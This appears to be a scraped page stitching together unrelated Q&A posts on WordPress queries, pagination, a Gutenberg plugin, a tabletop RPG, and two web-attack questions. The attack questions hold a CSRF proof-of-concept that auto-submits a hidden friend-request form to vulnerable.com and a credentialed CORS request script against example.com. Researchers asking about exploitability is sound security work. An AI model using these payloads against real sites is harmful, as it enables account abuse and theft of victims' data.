Display/Filter post using if else statement

Here it is: I want to filter my post based on category (Party) If the post with category Party has tag which is ‘event’, it is the one that will display If there is no ”event’ tag, only the recent post of Party category will display

here’s my code:

<?php      $  post_cat = array(             'posts_per_page' => '1',             'cat' => '3'             );     $  post_tag = array(             'posts_per_page' => '1',             'cat' => '3',             'tag' => 'event'             );       $  catquery = new WP_Query( $  post_cat );     $  tagquery = new WP_Query( $  post_tag );          if(has_tag()) :          while($  tagquery->have_posts()) : $  tagquery->the_post();            else if(has_category()) :        while($  catquery->have_posts()) : $  catquery->the_post();          else ?> <?php $  backgroundImg = wp_get_attachment_image_src( get_post_thumbnail_id($  post->ID), 'full' );?> <div class="blog-post-recent" style="background-image: url('<?php echo $  backgroundImg[0]; ?>');">     <div class="wrap">         <div class="blog-post-content">             <div class="blog-post-inner-content">                 <?php the_category();?>                 <div class="blog-post-title"><a href="<?php the_permalink() ?>"><?php the_title( '<h2>', '</h2>' ); ?></a></div>                 <div class="post-date"><?php the_date('F j, Y'); ?></div>                 <?php the_excerpt(); ?>                 <a class="blog-post-btn"  href="<?php the_permalink() ?>"> Read More...</a>';             </div>         </div>     </div> </div> <?php endif;     wp_reset_postdata(); ?> 

Go back to the exact post page number

I use pagination in my index.php and I have many posts per page. Every post have a button to go back to home. The problem is that when I visit a post in a page 5 for example, the button always send me on the first page.

I’m using this: <a href="<?php echo home_url(); ?>">back</a>

Is there a simple way to track the post page position, and use it to go back properly?

Save the post parent in a custom post type in Gutenberg

A plugin I’m developing registers two custom post types: Class and Student. Both are connected via the post_parent property in the Student post type (one student belongs to one class). I added a SelectControl control to the PluginDocumentSettingPanel in the Student post type edit screen to be able to set a Class for the Student. Everything is working except the saving part. The changes are not saved. Any ideas?

Thanks in advance

const { __ } = wp.i18n; const { compose } = wp.compose; const { registerPlugin } = wp.plugins; const { SelectControl } = wp.components; const { PluginDocumentSettingPanel } = wp.editPost; const { withSelect, withDispatch } = wp.data;  const applyWithSelect = withSelect( ( select ) => {     const {         getEditedPostAttribute,         getCurrentPostType     } = select( 'core/editor' );     const {         getEntityRecords     } = select( 'core' );      const parent = getEditedPostAttribute( 'parent' );      const posts = getEntityRecords( 'postType', 'class', { per_page: -1, orderby: 'title', order: 'asc', _fields: 'id,title' } )      return {         currentPostType: getCurrentPostType(),         parent: parent,         posts: posts     }; } );  const applyWithDispatch = withDispatch( ( dispatch ) => {     const { editPost } = dispatch( 'core/editor' );      return {         onUpdateParent( value ) {             editPost( { parent: Number( value ) } );         },     }; } );  function StudentOptionsPanelComponent( {     // These props are passed by applyWithSelect().     currentPostType, // current post type     parent, // current value of parent     posts, // all posts     // And these are passed by applyWithDispatch().     onUpdateParent,  // function which updates the meta restrict } ) {     if ( 'student' !== currentPostType ) {         return null;     }      if ( ! posts ) {         return __( 'Loading...', 'my-plugin' );     }      if ( posts.length === 0 ) {         return __( 'No classes found', 'my-plugin' );     }      var options = [];     options.push( {         label: __( 'Select a class...', 'my-plugin' ),         value: ''     } );      for ( var i = 0; i < posts.length; i++ ) {         options.push( {             label: posts[i].title.raw,             value: posts[i].id         } );     }      return (         <PluginDocumentSettingPanel             name='student-options'             title={ __( 'Options', 'my-plugin' ) }             className='student-options-panel'         >             <SelectControl                 label={ __( 'Select a class:', 'my-plugin' ) }                 value={ parent }                 options={ options }                 onChange={ onUpdateParent }             />         </PluginDocumentSettingPanel>     ); }  const StudentOptionsPanel = compose(     applyWithSelect,     applyWithDispatch )( StudentOptionsPanelComponent );  registerPlugin( 'student-options-panel', {     render: StudentOptionsPanel, } ); 

CSRF: GET request with POST data?

I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a POST request. Using usual exploitation techniques, I crafted the following webpage.

<html>     <head></head>     <body>         <span>csrf test</span>          <form action="http://vulnerable.com/friendRequest.asp" method="POST">             <input type="hidden" name="MessageArea" value="this is a test of csrf">             <input type="hidden" name="FriendName" value="testuser">         </form>          <script>             document.forms[0].submit();         </script>      </body> </html> 

Unfortunately though, the website checks for the origin header in the request, so this payload doesn’t work. Switching to a GET request and deleting the origin header actually sends the request successfully. The request looks like the following.

GET /friendRequest.asp HTTP/1.1 Host: www.vulnerable.com User-Agent: Mozilla/5.0 ... (no origin header) Cookie: secret_cookie  MessageArea=this+is+a+test+for+csrf&FriendName=testuser 

As you can see this is a GET request with POST data sent at the bottom. Unfortunately the request doesn’t go through with the parameters in the URL like in a true GET request. Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF? I have looked into XMLHttpRequest and fetch but I’m not sure that they are the right tools for the job.

Is it possible to send a POST CORS request with json data?

Is it possible to send a custom POST CORS request with json data?

I found that the website example.com is vulnerable to CORS and it’s accepting my origin header:


, however the request is a POST one and if i try without any post data i get: {"errorCode":"invalid","message":"Invalid json body","statusCode":400}

I was wondering if it’s possible to send cors requests containing json data. If it’s possible how should i edit my proof of concept code?

At the moment i’m using the following:

<script> var createCORSRequest = function(method, url) {   var xhr = new XMLHttpRequest();   if ("withCredentials" in xhr) {     // Most browsers.     xhr.open(method, url, true);   } else if (typeof XDomainRequest != "undefined") {     // IE8 & IE9     xhr = new XDomainRequest();     xhr.open(method, url);   } else {     // CORS not supported.     xhr = null;   }   return xhr; };  var url = 'https://example.com/api/v1/post'; var method = 'POST'; var xhr = createCORSRequest(method, url);  xhr.onload = function() {   // Success code goes here. };  xhr.onerror = function() {   // Error code goes here. };  xhr.withCredentials = true; xhr.send(); </script> 

But i’ll need to add {"id":"test","name":"test"} as POST json data to my PoC to make it work. How could i do that?

What is the name of this post apocalyptic setting?

There is a post apocalyptic setting that I’ve always wanted to play/GM and finally found a group for but I can not find the system anymore.

Here is what I remember.


Scene Based

Free online PDF

Modern and slightly beyond tech but more about salvage then inventing.

I think they used slightly modified stats, 4 core stats with one begin something like "Gutz"

Low magic. Whatever caused the apocalyptic caused a rift that allowed magic. But mostly it was like mind reading psychic type with some healing ect.

Many classes revolved around access to items/equipment that would be rare. Medic might have a small makeshift lab. Mechanic might have a small workshop with some tools. Occult leader would have their followers and maybe a base. Mob leader might have a base. Bike gang leader might have a small group of NPC bikers.